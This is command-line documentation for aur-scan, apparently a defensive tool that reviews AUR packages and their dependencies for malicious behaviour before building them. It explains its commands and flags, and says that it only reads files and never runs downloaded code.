Kief Studio aur‑scanner

Commands

aur-scan check — pre-install review

Resolves the full transitive AUR dependency tree, scans every untrusted package, prints a reviewable tree, and can emit a CycloneDX SBOM — all before anything builds. A hijacked package is often a dependency, so the named package alone is not enough.

aur-scan check <package>...
aur-scan check <package> --sbom tree.cdx.json     # write an SBOM
aur-scan check <package> --no-confirm --fail-on high   # CI gate
aur-scan check --local ./mypkg                    # scan exact on-disk bytes

aur-scan install — race-free install

Fetch each AUR package once, scan those exact directories, gate on findings, then build them in dependency order with makepkg. The bytes scanned are the bytes built — no time-of-check/time-of-use gap.

aur-scan install <package>...
aur-scan install <package> --gate high       # block on high+ findings
aur-scan install <package> --sbom tree.cdx.json

aur-scan scan — local PKGBUILD

aur-scan scan ./PKGBUILD
aur-scan scan ./my-package/        # directory (PKGBUILD + .install)
aur-scan scan ./pkg --format sarif # text | json | sarif

aur-scan system — audit what’s installed

Cross-references every installed AUR package against the IOC database, scans cached PKGBUILDs, and flags any package that gained risky behavior since the last scan.

aur-scan system
aur-scan -c ti.toml system   # also VT/URLhaus-check every installed package (opt-in)

aur-scan ioc — indicators of compromise

aur-scan ioc                 # database stats + campaigns
aur-scan ioc --check <name>  # is this a known-malicious indicator?

aur-scan codes / explain

aur-scan codes                       # the full detection catalog
aur-scan codes --format markdown     # or json
aur-scan explain EXEC-REMOTE         # detail on one code

Global flags

These apply to any command:

-c, --config <FILE>     # load a config (enables opt-in threat intelligence; see below)
-s, --severity <LEVEL>  # minimum severity to report: critical|high|medium|low|info
    --fail-on <LEVEL>   # (scan) exit non-zero at or above this severity — for CI gates
    --no-color          # disable ANSI color (also honored: the NO_COLOR env var)
-q, --quiet             # only show findings
-v, --verbose

-c turns on threat intelligence — optional, opt-in VirusTotal / URLhaus lookups that are off unless you enable them and supply your own key. A scan with no config makes zero network calls.

One thing worth knowing

aur-scan only ever reads. It doesn’t source the PKGBUILD, doesn’t run makepkg to peek inside, doesn’t follow a URL it finds, doesn’t run anything it downloads. So when a package tries to pull and run code from somewhere else, it tells you (that’s EXEC-REMOTE, and it gives you the URL) and stops. It won’t go fetch that code, because then the scanner would be the thing running the payload. “We can’t see past this point” is the honest answer, and it’s the safe one.